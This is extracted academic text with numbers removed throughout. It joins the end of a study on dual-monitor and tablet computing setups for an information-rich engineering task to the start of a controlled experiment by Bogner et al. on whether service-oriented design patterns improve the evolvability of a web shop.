dual monitor desktop with a single tablet computer (condition b) was the ideal computing environment for the “information-rich” engineering problem given to participants. this is supported by converging evidence from the dependent measures as well as the qualitative debrief interviews. a single desktop monitor with two tablet computers (condition c) did not provide any advantage compared to a single desktop monitor (condition a). overall, these findings provide only marginal support for the concept we set out to investigate, which was the notion that more screens and possibly more devices may help focus one’s attention rather than serve as a distraction, making multiple tasks viewable at a glance across multiple device screens (thompson, ). the finding of a performance and usability advantage of the dual monitors in condition b is consistent with previous studies (anderson et al., ; poder et al., ; russell & wong, ). a key difference in our study is that we provided a tablet computer in addition to the dual monitors. however, the debrief interviews were mixed as to the usefulness of the third screen provided by the tablet; some participants thought it was not helpful whereas other did find it useful. the complete lack of performance, workload, and usability differences between condition c (single monitor and two tablet computers) and condition a (single monitor) does not support the notion that a multiscreen environment can help focus one’s attention. indeed, some participants noted that using multiple screens provided by the tablet computer(s) was distracting. others noted that while they did not hinder their tasks, they did not help. . 
limitations and future research our study focused on engineering students completing flow process charts with a race car pit stop scenario as an example of an information-rich task, where the use of multiple screens was potentially useful. a more complex scenario or application area, with a clearer distinction for parsing certain information across screens with distinctly different purposes, may be more amenable to a multiscreen and multi-device environment. for example, a physician who needs to integrate patient data and other information from multiple functions within an ehr and other related clinical information systems may be a more beneficial example to investigate in a future study. also, our study used apple ipad tablets; all but one of our participants had experience using tablet computers but only one reported regularly using an ipad. future research should incorporate other types of tablets and mobile devices, as well as more advanced ones that may better approximate the forgotten power of paper (e.g., tarun et al., ). . conclusion we designed a study to investigate the potential benefit of multiscreen and multiple device environments using three different computing environment conditions. scenarios completed with condition b, which included a desktop with dual -inch monitors, as well as a single tablet computer with a . -inch display, resulted in significantly fewer errors compared to condition c, which included a desktop with a -inch monitor, as well as two tablet computers with . -inch displays. condition b also resulted in significantly higher usability ratings compared to condition c and compared to a baseline condition a (single desktop computer with a -inch monitor). our findings are consistent with the literature that shows better performance using a dual-screen set-up. however, our findings provide only marginal support for the benefit of incorporating additional screens in the form of tablet computers during information-rich, complex tasks. based on these results, we recommend a computing work environment with dual screen monitors, with an optional tablet computer, for complex and information-rich computing tasks. acknowledgements a portion of the results from this study was presented at the human factors and ergonomics society (hfes) international annual meeting, austin, tx, october – , . this work was supported by the department of industrial engineering, j.b. speed school of engineering, and the center for ergonomics, university of louisville. references anderson, a., colvin, j., tobler, n., & lindsay, d. ( ). productivity and multi-screen displays. rocky mountain communication review, , - . armyranger [screen name]. ( ). nascar pit stop at talledega . retrieved from https://www.youtube.com/watch?v=grhsondlsjq. byrd, k. s. & caldwell, b. s. ( ). increased memory load during task completion when procedures are presented on mobile screens. behaviour & information technology, , - . czerwinski, m., robertson, g., meyers, b., smith, g., robbins, d., & tan, d. ( ). large display research overview. proceedings of chi , - . de backere f., vanhove, t., dejonghe, e., feys, m., herinckx, t., vankelecom, j. et al. ( ). platform for efficient switching between multiple devices in the intensive care unit. methods inf.med., , - . grudin, j. ( ). partitioning digital worlds: focal and peripheral awareness in multiple monitor use. proc.chi , - . hart, s. & staveland, l. ( ). development of the nasa-tlx (task load index): results of empirical and theoretical research.
in p.a.hancock & n. meshkati (eds.), human mental workload (pp. - ). north-holland: elsevier science publishers. hendy, k. c., hamilton, k. m., & landry, l. n. ( ). measuring subjective workload: when is one scale better than many? human factors, , - . http://www.youtube.com/watch?v=grhsondlsjq interstate batteries. ( ). inside a nascar pit stop with joe gibbs racing pit crew coach mike lepp. retrieved from https://www.youtube.com/watch?v=pdskh ge xm. jokela, t., ojala, j., & olsson, t. ( ). a diary study on combining multiple information devices in everyday activities and tasks. in proceedings of the rd annual acm conference on human factors in computing systems (pp. - ). acm. lewis, j. r. ( ). ibm computer usability satisfaction questionnaires: psychometric evaluation and instructions for use. international journal of human-computer interaction, , - . nygren, t. e. ( ). psychometric properties of subjective workload measurement techniques: implications for their use in the assessment of perceived mental workload. human factors, , - . poder, t. g., godbout, s. t., & bellemare, c. ( ). dual vs. single computer monitor in a canadian hospital archiving department: a study of efficiency and satisfaction. health information management journal, , - . rashid, u., nacenta, m. a., & quigley, a. ( ). factors influencing visual attention switch in multi-display user interfaces: a survey. proceedings of the international symposium on pervasive displays, . russell, s. e. & wong, k. ( ). dual-screen monitors: a qualitative analysis of their use in an academic library. the journal of academic librarianship, , - . saleem, j. j., russ, a. l., justice, c. f., hagg, h., ebright, p. r., woodbridge, p. a. et al. ( ). exploring the persistence of paper with the electronic health record. int.j.med.inform., , - . http://www.youtube.com/watch?v=pdskh ge xm shin, g. & hegde, s. ( ). user-preferred position of computer displays: effects of display size. hum.factors, , - . simmons, t. ( ). what's the optimum computer display size? ergonomics in design, , - . simmons, t. & manahan, m. ( ). the effects of monitor size on user performance and preference. proceedings of the human factors and ergonomics society rd annual meeting, . tan, d. s. & czerwinski, m. ( ). effects of visual separation and physical continuities when distributing information across multiple displays. proc.interact , - . tarun, a., wang, p., girouard, a., strohmeier, p., reilly, d., & vertegaal, r. ( ). papertab: an electronic paper computer with multiple large flexible electrophoretic displays. in extended abstracts of acm chi’ conference on human factors in computing. acm press, pp. - . thompson, c. ( , july ). how working on multiple screens can actually help you focus. wired. retrieved from http://www.wired.com/ / /multi-screen-life/ figure three experimental conditions for computing environment. condition a had a single desktop computer with a -inch monitor (baseline condition). condition b had a desktop with dual -inch monitors, as well as a single tablet computer with a . -inch display. condition c had a desktop with a -inch monitor, as well as two tablet computers, with . inch displays. table (on next page) information partition across screens and devices participants were asked to use flow process charts to document the steps that members of a race car team perform during a pit stop for each of the three experimental conditions for computing environment. 
the table shows how the information needed to complete the scenario was partitioned across the screens and devices for each condition. table information partition across screens and devices screen/device condition a condition b condition c monitor tutorial video flow process chart tutorial video pit stop video flow process chart flow process chart email access email access dimension sheet monitor n/a tutorial video n/a email access dimension sheet ipad n/a pit stop video pit stop video ipad n/a n/a dimension sheet table (on next page) summary of nasa tlx scores (mean, standard deviation) the table shows workload ratings for each of the six subscales and overall composite score for the nasa tlx. cond., condition; md, mental demand; pd, physical demand; td, temporal demand; perf., performance; frust., frustration; total, total composite tlx score, unweighted. table summary of nasa tlx scores (mean, standard deviation) cond md pd td perf. effort frust. total a . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) b . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) c . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) note. cond., condition; md, mental demand; pd, physical demand; td, temporal demand; perf., performance; frust., frustration; total, total composite tlx score, unweighted. table (on next page) usability scores fromthe computer system usability questionnaire (csuq) the table shows the usability ratings from the csuq. item was excluded from the analysis as not applicable. ratings are derived from -point likert-type scales ranging from = strongly disagree to = strongly agree. * p values indicate statistically significant findings ( p < . ). p values reported for system usefulness and information quality are from analysis of variance (anova). p values reported for overall satisfaction and interface quality are from the friedman two-way anova, unadjusted for ties. table usability scores from the computer system usability questionnaire (csuq) score condition a condition b condition c p value overall satisfaction (items - ) . ( . ) . ( . ) . ( . ) . * system usefulness (items - ) . ( . ) . ( . ) . ( . ) . * information quality (items - ) . ( . ) . ( . ) . ( . ) . interface quality (items - ) . ( . ) . ( . ) . ( . ) . * note. item was excluded from the analysis as not applicable. ratings are derived from -point likert-type scales ranging from = strongly disagree to = strongly agree. *p values indicate statistically significant findings (p< . ). p values reported for system usefulness and information quality are from analysis of variance (anova). p values reported for overall satisfaction and interface quality are from the friedman two-way anova, unadjusted for ties. on the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis on the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis justus bogner , , stefan wagner and alfred zimmermann herman hollerith center, university of applied sciences reutlingen, boeblingen, baden-wuerttemberg, germany institute of software technology/software engineering group, university of stuttgart, stuttgart, baden-wuerttemberg, germany abstract background: design patterns are supposed to improve various quality attributes of software systems. however, there is controversial quantitative evidence of this impact. especially for younger paradigms such as service- and microservice-based systems, there is a lack of empirical studies. 
objective: in this study, we focused on the effect of four service-based patterns—namely process abstraction, service façade, decomposed capability, and event-driven messaging—on the evolvability of a system from the viewpoint of inexperienced developers. method: we conducted a controlled experiment with bachelor students (n = ). two functionally equivalent versions of a service-based web shop—one with patterns (treatment group), one without (control group)—had to be changed and extended in three tasks. we measured evolvability by the effectiveness and efficiency of the participants in these tasks. additionally, we compared both system versions with nine structural maintainability metrics for size, granularity, complexity, cohesion, and coupling. results: both experiment groups were able to complete a similar number of tasks within the allowed min. median effectiveness was / . mean efficiency was % higher in the treatment group, but this difference was not statistically significant. only for the third task, we found statistical support for accepting the alternative hypothesis that the pattern version led to higher efficiency. in the metric analysis, the pattern version had worse measurements for size and granularity while simultaneously having slightly better values for coupling metrics. complexity and cohesion were not impacted. interpretation: for the experiment, our analysis suggests that the difference in efficiency is stronger with more experienced participants and increased from task to task. with respect to the metrics, the patterns introduce additional volume in the system, but also seem to decrease coupling in some areas. conclusions: overall, there was no clear evidence for a decisive positive effect of using service-based patterns, neither for the student experiment nor for the metric analysis. this effect might only be visible in an experiment setting with higher initial effort to understand the system or with more experienced developers. subjects world wide web and web science, software engineering keywords design patterns, evolvability, modifiability, controlled experiment, metrics, service-oriented architecture, service-based systems, microservices how to cite this article bogner j, wagner s, zimmermann a. . on the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis. peerj comput. sci. :e doi . /peerj-cs. submitted may accepted july published august corresponding author justus bogner, justus.bogner@iste. uni-stuttgart.de academic editor philipp leitner additional information and declarations can be found on page doi . /peerj-cs. copyright bogner et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:justus.�bogner@�iste.�uni-stuttgart.�de mailto:justus.�bogner@�iste.�uni-stuttgart.�de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ introduction one important concern for enterprise software in today’s digital and fast-moving world is the ability to quickly adapt to new or changing functional or cross-functional requirements. 
this concern is addressed by the software quality attribute evolvability (sometimes also referred to as modifiability or changeability): the degree of effectiveness and efficiency with which a software system can be modified to adapt or extend it (rowe, leaney & lowe, ; international organization for standardization, ). several benefits related to this quality attribute were achieved with the rise of service- oriented computing (soc) (papazoglou, ), such as loose coupling, isolation of the service implementation behind business-relevant interfaces, or convenient reuse and composition. while service-oriented architecture (soa) (erl, ) is still an important architectural style, microservices (newman, ; fowler, ) gain more and more popularity as a flexible, lightweight, and decentralized service-oriented variant. one frequently used instrument to enhance modifiability is the application of design patterns. employing these established solution blueprints for recurring problems is especially common with object-oriented systems. there is, however, also a significant amount of patterns specifically designed for service-based and even microservice-based systems (erl, ; rotem-gal-oz, ; richardson, ). one issue with design patterns is that their relationship with quality attributes (qas) is often complex and governed by trade-offs. moreover, while the benefits of patterns for qas like modifiability seem plausible in theoretical and qualitative studies (bogner, wagner & zimmermann, ), quantitative empirical evidence for their effectiveness is of a more controversial nature. in scientific literature, we find studies that do report a positive impact on qas, studies that do not, and studies that do so under certain conditions or only for selected patterns (garzás, garcía & piattini, ; hegedūs et al., ; ali & elish, ). awareness of and familiarity with the concrete patterns is often discussed as a prerequisite for their effectiveness. since most of these studies are concerned with object-oriented or architectural patterns and there is very little empirical research on service-oriented patterns and modifiability, we conducted a controlled experiment to partially address this gap. a total of students in two groups changed and extended two functionally equivalent versions of a service-based web shop system (one pattern version, one non-pattern version) while the time was measured for each task. independent of this experiment, we also collected structural maintainability metrics (e.g. size, coupling, cohesion) for both system versions to have a foundation for a second comparison. the research objective for this study can therefore be summarized in the following way: analyze selected service-oriented patterns for the purpose of improving modifiability with respect to effectiveness, efficiency, and structural metrics from the viewpoint of inexperienced software developers (students) in the context of a service-based web shop system bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we follow the basic structure of the reporting guidelines for experiments in software engineering as proposed by jedlitschka, ciolkowski & pfahl ( ). the remainder of the paper first presents the technical background (“background”) by elaborating the concept of (service-oriented) design patterns and discussing related work in the area. 
after that, we describe the experiment design (“experiment design”) and present the experiment results (“experiment results”) followed by the metric results (“metric analysis”). in the sections thereafter, we provide possible interpretations (“discussion”) and discuss limitations (“threats to validity”). lastly, we compile the most important lessons learned (“lessons learned from the experiment”) and conclude with a summary as well as potential future work (“conclusion”). background to understand the motivation behind this study, two topics need to be explained in greater detail: namely patterns as an instrument of software design as well as their relation to qas, for which we present related work in the area. design patterns the idea of design patterns originated from the construction and city building language of alexander, ishikawa & silverstein ( ), who conceptualized a network of solution blueprints. the concept was adapted to several other domains including computer science and is very popular in software engineering and software architecture. as such, a pattern is a proven and established solution to a recurring design problem that is documented in a technology-agnostic form and can be implemented in many similar yet not completely identical ways. the documentation is often systematic and standardized within a pattern language and includes for example attributes like context, problem, forces, solution, or related patterns. while the most famous examples are the object-oriented “gang of four” design patterns of gamma et al. ( ), there are meanwhile patterns for software architecture (buschmann et al., ), enterprise applications (fowler, ), message- based integration (hohpe & woolf, ), or cloud computing (fehling et al., ). there is also a significant body of patterns in the field of soc. most of these have been conceptualized for the context of soa. prominent examples are the patterns by erl ( ), erl et al. ( ), rotem-gal-oz ( ), or daigneau ( ). they are usually on an architectural level and are for example, concerned with service inventories, communication, and composition, but can also be focused on the design of an individual service. even though a significant number of soa patterns seems to be also applicable to microservices (bogner, zimmermann & wagner, ), the first pattern languages for the younger service-based architectural style are emerging (richardson, ). furthermore, several of these microservices patterns have existing ancestor patterns from soa or other contexts. related work one primary driver for the use of patterns is their impact on qas like availability, performance, or modifiability. several studies have been conducted to analyze this complex and controversial relationship. bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the context of object-oriented design, garzás, garcía & piattini ( ) conducted a controlled experiment with students who had to analyze and modify four uml class diagrams. one group worked on a standard and straightforward design model while the other had a semantically equivalent version that contained design rules (e.g., “dependencies between classes must be implemented with abstractions.”) and patterns (e.g. state or composite). understandability (via questions) and modifiability (via extension tasks) were measured. 
results showed that the latter version with rules and patterns was more difficult to understand ( % less time and % more correct answers for the non-pattern version). for modifiability, no statistically significant difference in efficiency could be identified. hegedūs et al. ( ) used a probabilistic quality model based on iso/iec to analyze the maintainability of more than revisions of the java gui framework jhotdraw, which employs well-known object-oriented patterns. every usage of design patterns in jhotdraw is documented with javadoc and there are a lot of revisions that only introduce patterns. the authors conclude from the analysis that the introduction of additional patterns increased the overall maintainability in the system. they measured a strong correlation (r-value: . ) between pattern-line-density and maintainability. a broader view on the impact of the “gang of four” design patterns on software quality is given by ali & elish ( ). their comparative literature analysis of empirical studies revealed that only four qas and only a small subset of the patterns have been examined. moreover, no general consensus concerning the impact could be reached (positive, neutral, or negative). interestingly, for maintainability, evolution, and change-proneness, the overall tendencies concerning the impact of the analyzed patterns were negative. in the domain of architectural patterns, kassab, el-boussaidi & mili ( ) analyzed the impact of the patterns pipes and filters, layers, model view controller, and broker on the two qas performance and security. they determined the quantitative effect of patterns on qas via the proxy of architectural tactics. from these results, they concluded for example, that model view controller is best suited for performance while being least suited for security and that the layers pattern is most accommodating for security. riaz, breaux & williams ( ) conducted a systematic mapping study with the goal to characterize the research design of empirical studies with human subjects about the application of software patterns. maintenance was the most frequent context with of studies. nearly half of the studies were concerned with object-oriented design patterns ( ). efficiency and correctness were the most common measures for evaluating the pattern application. the authors also report that differences in experiment design make it difficult to compare the results and that several studies fail to mention limitations as well as how they minimized the threat of biases. in the context of service orientation, galster & avgeriou ( ) performed a theoretical qualitative mapping of ∼ service-based design patterns to the qas of the s-cube quality reference model via force resolution maps (impact from - to + ). they reported that qas from the very detailed s-cube model were not addressed by the patterns. most mapped qas were performance and scalability. since s-cube does not include some bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ important qas, they also used iso/iec . for maintainability, they identified a total of patterns. lastly, palma et al. ( ) analyzed the impact of service-based patterns and anti-patterns on maintenance and evolution by collecting historical software development meta data (# of changes and code churn) for the frascati system. they observed that services involved in patterns required less maintenance effort. however, this effect was not statistically significant. 
services with anti-patterns on the other hand were found to need significantly more maintenance effort, especially for instances of god component or service chain. the presented related work gives an overview of the complex relationship between patterns and qas and the controversial evidence. not many empirical quantitative studies exist for service-based patterns in general and their modifiability in particular, which is why we aim to bring additional quantitative insights into this relationship with the results of the first controlled experiment as well as a metric-based analysis. experiment design the research goal for our experiment was to analyze if selected service-based patterns have a significant impact on the evolvability of a system in terms of the completion of modifications within a given time (effectiveness) and the time needed per modification (efficiency). the experiment object was a simple service-based web shop system that has been specifically constructed for this experiment . it consists of several restful java services for example, customers, orders, products, and notifications and a web based frontend. data persistence and unnecessary create read update delete (crud) operations have not been fully implemented. as such, the system is reasonably close to a real world web shop, but is still of manageable complexity for an experiment. the online shop domain was chosen because most people are somewhat familiar with it from personal experience. moreover, it is very common to implement such systems in a service-oriented way. we created two functionally equivalent versions of this web shop. one version was built in an “ordinary” way (see figs. and ) while the other version was designed with several service-based patterns that are believed to be beneficial for modifiability, for example, process abstraction and service façade (see figs. and ). table lists the selected patterns together with their source, intended effect, and relevant task number. in general, the pattern version of the system exhibits a higher base complexity (e.g., more services, special patterns), but has been intentionally prepared for the nature of the task modifications through the used patterns. we chose these patterns because their theoretical benefit for evolvability is well documented. while professional software developers who are familiar with service-based systems and patterns could be fitting experiment subjects, we instead opted for more inexperienced developers, that is, students. first, it is very difficult to convince a large number of software professionals to spend two hours of their valuable time for free on seemingly meaningless coding. and second, if the patterns’ advantages materialize even with inexperienced developers that have little or no conscious knowledge of them, their effect on evolvability must be substantial. however, while it is common to use students in software engineering see https://github.com/xjreb/research- modifiability-pattern-experiment for source code, task descriptions, survey questions, data set, and analysis results. zenodo mirror for non-source code artifacts: doi . /zenodo. . bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/xjreb/research-modifiability-pattern-experiment https://github.com/xjreb/research-modifiability-pattern-experiment https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. 
experiments, one must be more careful when generalizing the results to the population of all developers. on the plus side, students are often fairly homogeneous participants. finally, several studies have shown that using students instead of software professionals may affect the results only marginally in a lot of cases (host, regnell & wohlin, ; salman, misirli & juristo, ; falessi et al., ).

figure: version # pre-experiment: initial architecture of non-pattern version (services: webui, ordersrv, productsrv, customersrv, notificationsrv; edges: invokes).
figure: version # post-experiment: final architecture of non-pattern version (services: webui, ordersrv, productsrv, categorysrv, warehousesrv, customersrv, notificationsrv; edges: invokes).
figure: version # pre-experiment: initial architecture of pattern version (services: webui, orderprocesssrv (process abstraction), productsrvfacade (service facade), productsrv (decomposed capability), ordersrv, customersrv, notificationsrv, kafka broker; edges: invokes, publishes).
figure: version # post-experiment: final architecture of pattern version (services: webui, orderprocesssrv (process abstraction), productsrvfacade (service facade), productsrv, categorysrv, warehousesrv, ordersrv, customersrv, notificationsrv, kafka broker; edges: invokes, publishes, subscribes).

our experiment subjects therefore were bachelor students (n = ) that needed to participate in an experiment as part of the "introduction to software engineering" lecture (mostly nd and rd semesters). students could choose one of two experiments based on a short description. data collection was anonymous and experiment performance had no influence on the students' grades. participating in the experiment without data collection was also possible to pass the course. during experiment execution, students assigned themselves randomly and unknowingly to one of the two groups by choosing a seat in the pc pool room: either the non-pattern version # , that is, the control group, or the pattern version # , that is, the treatment group.

table: list of applied patterns in system version # .
pattern name | source | intended effect | task
process abstraction | erl ( ) | details of the order process are abstracted in composition controller; changes can be made in central location (orderprocesssrv) | #
service façade | erl ( ) | shields the productsrv against all consumers; changes to the interface only have to be addressed at the façade | #
decomposed capability | erl ( ) | large and incohesive productsrv is prepared for future decomposition by internally isolating domain concepts | #
event-driven messaging/inversion of communications | erl ( ) and rotem-gal-oz ( ) | productsrv publishes events instead of directly calling other services; decoupling of producers and consumers | #

as experiment materials, students were provided with a fully configured virtual machine in the university pc pool room. they had documentation and task descriptions in both digital and printed form. they were allowed to use internet search in case of issues.
a web interface with automatic tests for validating the completion of each of the three tasks was provided as well. students were advised to measure their own time per task with a stopwatch of their choosing. participants had to solve a total of three tasks that depended on each other (see table ). in the first task, the ordering process of the web shop system should be adjusted (e.g., customer credit rating check) and extended with an additional process step (sending of an email via the notificationsrv). version # had been prepared with the process abstraction pattern so that all changes had to be implemented in the orderprocesssrv as opposed to in three different services like in version # . in the second task, the large productsrv had to be decomposed into three smaller services: a productsrv to manage only product domain entities, a categorysrv to manage product categories, and a warehousesrv for product availability. version # incorporated the decomposed capability pattern to ease the decomposition as well as the service façade pattern that shielded the former productsrv from consumers. in the final task, a new process in response to adding a new product to the database should be implemented (sending out email and adding the new product to a marketing database). version # provided message-based communication via an apache kafka broker that allowed publishing a newproductevent, which implements the patterns event-driven messaging and inversion of communications. please refer to the folders workspace-version /_exercises or workspace-version /_exercises in our github repository (https://github.com/xjreb/research-modifiability-pattern-experiment) for the complete task descriptions. as response variables for our experiment, we analyzed effectiveness and efficiency (duration per task). effectiveness of a participant was measured as the percentage of the three tasks he/she successfully completed within the min, that is, %, %, %, or %. efficiency was recorded in seconds or as not available if the task was not completed. median effectiveness per group was only calculated and tested for the total of all three tasks. for mean efficiency, we additionally also analyzed and compared every individual task to derive the effect per pattern. while these two response variables also depend on the skill of the participants, they can characterize the systems’ evolvability if the two groups table list of experiment tasks. task task description # adjust the web shop ordering process (customer credit rating check, minimum available number of products) and extend it with an additional process step (sending of an email via the notificationsrv). # decompose the large productsrv into three smaller services: a productsrv to manage only product domain entities, a categorysrv to manage product categories, and a warehousesrv for product availability. # implement a new process triggered in response to adding a new product to the database. the new process sends out emails and adds the new product to a marketing database. bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/xjreb/research-modifiability-pattern-experiment http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ are large enough and roughly equal in skill. the predictor variable was the group or system version (i.e., control or treatment group). it was either # for the non-pattern version or # for the pattern version. 
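To make the operationalization of the two response variables concrete, the following minimal Python sketch derives effectiveness and efficiency from per-task duration records. It is an illustration only: the participant records, field names, and helper functions are invented and are not taken from the authors' replication package.

```python
import statistics

# hypothetical raw measurements: seconds per task, None = task not completed in time
# (participant ids, durations, and group labels are invented illustration data)
participants = [
    {"id": "p01", "version": 1, "durations": [1800, 2400, None]},
    {"id": "p02", "version": 2, "durations": [2100, 1500, 900]},
    {"id": "p03", "version": 2, "durations": [None, None, None]},
]

def effectiveness(durations):
    # share of the three tasks completed within the time limit (0, 1/3, 2/3, or 1)
    return sum(d is not None for d in durations) / len(durations)

def efficiency(durations):
    # mean seconds per completed task; None if no task was completed
    done = [d for d in durations if d is not None]
    return statistics.mean(done) if done else None

for group in (1, 2):
    rows = [p for p in participants if p["version"] == group]
    eff_values = [effectiveness(p["durations"]) for p in rows]
    dur_values = [d for d in (efficiency(p["durations"]) for p in rows) if d is not None]
    print("version #%d:" % group,
          "median effectiveness =", statistics.median(eff_values),
          "| mean duration per completed task =",
          statistics.mean(dur_values) if dur_values else "n/a")
```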
to formalize our research objective, we constructed five experiment hypotheses h ij and their respective null hypotheses h ij, where i denotes the research goal identifier and j the counter if there is more than one hypothesis per goal (see table ). for effectiveness (i = ), we have one hypothesis (j = ) while for efficiency (i = ), we have four ( � j � , j ∈ ℕ), namely one per individual task and one for the complete set of tasks at once. since we have five hypotheses, this also means that we need bonferroni correction for the significance level of our hypothesis tests to account for the increased probability of type i errors. the necessary significance level a therefore is calculated by dividing the desired significance level by the number of hypotheses, that is, a = . / = . . the experiment execution took place in the following way. to prepare participants for the experiment, an introductory presentation was given on a separate day ( min). a total of of the students attended (∼ %). in this session, the structure and procedure of the experiment were explained. we also described the data collection and analysis process. furthermore, an introduction to the basic concepts of soc and restful http services was given to ensure a common base level of knowledge. lastly, the details of the experiment workspace were presented, e.g. ubuntu vm, eclipse integrated development environment (ide), directory structure, build scripts, task validation. the actual experiment took place over the course of the week following the introductory presentation in slots of – students. in such a slot (∼ h), there was first a short table pairs of experiment hypotheses (each in the form of an alternative hypothesis h ij and its null hypotheses h ij, where i represents the research goal identifier and j the counter for more than one hypothesis per goal; effectiveness: i = , efficiency: i = ); evx denotes the effectiveness for version x; dvx denotes the task durations for version x; dvx,ty denotes the task durations for version x and task y. alternative hypothesis null hypothesis effectiveness h : more tasks for the pattern version # of the system can be completed within the given time than for the non-pattern version # : median(ev ) > median(ev ) h : there is no difference in how many tasks can be completed for both versions of the system: median(ev ) ≈ median(ev ) efficiency (task duration) h : it takes less time to complete task# for the pattern version # of the system than for the non-pattern version # : mean(dv ,t ) < mean(dv ,t ) h : there is no difference in the time it takes to complete task# for both versions of the system: mean(dv ,t ) ≈ mean(dv ,t ) h : it takes less time to complete task# for the pattern version # of the system than for the non-pattern version # : mean(dv ,t ) < mean(dv ,t ) h : there is no difference in the time it takes to complete task# for both versions of the system: mean(dv ,t ) ≈ mean(dv ,t ) h : it takes less time to complete task# for the pattern version # of the system than for the non-pattern version # : mean(dv ,t ) < mean(dv ,t ) h : there is no difference in the time it takes to complete task# for both versions of the system: mean(dv ,t ) ≈ mean(dv ,t ) h : it takes less time to complete a task for the pattern version # of the system than for the non-pattern version # : mean(dv ) < mean(dv ) h : there is no difference in the time it takes to complete a task for both versions of the system: mean(dv ) ≈ mean(dv ) bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ introduction ( min) explaining the procedure and agenda. details of what would be measured and what data would be collected via the post-experiment survey were presented. we pointed out that experiment performance had absolutely no influence on the grade. data collection would be anonymous and participant ids could not be linked to student ids. following these explanations, we asked if there were any questions regarding this process and if it was acceptable for everybody (verbal consent). we also specifically pointed out the option to participate in the experiment without data collection. after that, there was a familiarization period ( min) during which students should get comfortable with the workspace and the system by reading documentation and playing around with the ide and the build scripts. this period was followed by the actual task execution with time measurement. participants had min to complete all three tasks. a web-based evaluation application with automated tests was provided to check for successful task completion. participants recorded their own time with a stopwatch and paused upon successful validation of a task via the evaluation ui. an experiment administrator was then notified to verify the completion and to document the duration. the timer was then reset and the next task began. after solving all three tasks or after min, participants finally filled out a short web-based survey with questions about the perceived difficulty per task, personal information (e.g. course of study and semester), and their self-reported experience with for example java, service-based systems, and patterns. their participant id and system version was also recorded to relate it to the task durations. it was not possible to identify the student by name via the participant id, which guaranteed the anonymity of the results. please refer to the repository for the full list of questions. after completing this survey, participants finished the experiment slot and were allowed to leave. experiment results for the analysis, the documented task duration measurements per participant were first combined with the exported survey results via the participant id. we then divided the resulting data set into the two groups (version # and version # ) and analyzed it with descriptive statistics. initially, we wanted to ensure that both versions had comparable characteristics and experience, which is the case in most areas (see table ). on average, group # with participants and group # with participants were of roughly the same study program distribution and semester (∼ . ). when comparing programming experience and self-reported skill, group # seems to have been slightly more experienced. more participants of group # , however, attended the introductory presentation (∼ % points more), a factor that was correlated with effectiveness (kendall’s tau: . , p-value: . ). the standard deviation for most attributes was also similar in both groups and fairly low in general (e.g. around or below . for most -point ordinal scale questions). therefore, the set of participants could be considered as sufficiently homogeneous. so all in all, the two groups were similar enough to assume equal conditions for an effectiveness and efficiency comparison with respect to the treatment, that is, the patterns. with / , median effectiveness was identical for both groups. 
overall, of participants (∼ %) were able to solve task # , a total of of these additionally solved task bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ # (∼ %), and only participants finished all three tasks (∼ %). roughly % were not able to solve any task, namely out of for group # ( . %) and out of for group # ( . %). the self-reported difficulty/complexity per task ( – ) was also fairly similar for both groups. the only notable exception for this was task # which was perceived as . points less difficult by the pattern group # ( . vs . points). when filtering only for the participants who actually finished this task, the difference is nearly identical ( . points), even though the estimated difficulty is lower ( . vs . ). when analyzing participant efficiency, that is, duration for task completion, we observed that the mean duration per completed task for the total of all three tasks was about % lower for the pattern group # ( : : vs : : ). the analysis per individual task revealed that this is caused by task # and # : group # needed on average ∼ % less time for task # and ∼ % for task # respectively. task # , on the other hand, took group # ∼ % more time to complete. table lists the detailed results for this. the efficiency difference can also be conveniently observed in a boxplot that shows the statistical distribution for task duration (in seconds) grouped by system version and task number (see fig. ). the next step was hypothesis testing, that is, analyzing if the differences between the groups are statistically significant so that we can reject the null hypotheses. to prepare table group characteristics and self-reported experience (sd represents the standard deviation; for experience questions based on the -point ordinal scale, represents “not experienced” while represents “very experienced”). group # (no patterns) group # (patterns) participants ( %) ( %) b.sc. business information systems ( %) ( %) b.sc. computer science ( %) ( %) b.sc. software engineering ( %) ( %) other study programs ( . %) ( . %) introduction attendance ( %) ( %) semesters mean . . sd . . years of programming experience mean . . sd . . java experience ( – ) mean . . sd . . web development experience ( – ) mean . . sd . . service-based systems experience ( – ) mean . . sd . . design patterns experience ( – ) mean . . sd . . service-based patterns experience ( – ) mean . . sd . . all experience-related attributes ( – ) mean . . bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the selection of a suitable statistical test, we first used the shapiro–wilk test to check if our samples were non-normally distributed. for all samples, the p-value was substantially smaller than . , so we had to reject the null hypothesis that our data came from a normal distribution. we therefore needed a non-parametric test that could handle non-normal distributions. the mann–whitney u test (also known as wilcoxon–mann–whitney test) fulfills this requirement. it checks the null hypothesis that the probability is equal that a random value from one group is less than or greater than a random value from another group. we used an exact implementation correcting for ties that were likely to happen for the effectiveness test (only four different values: / ; / ; / ; / ). 
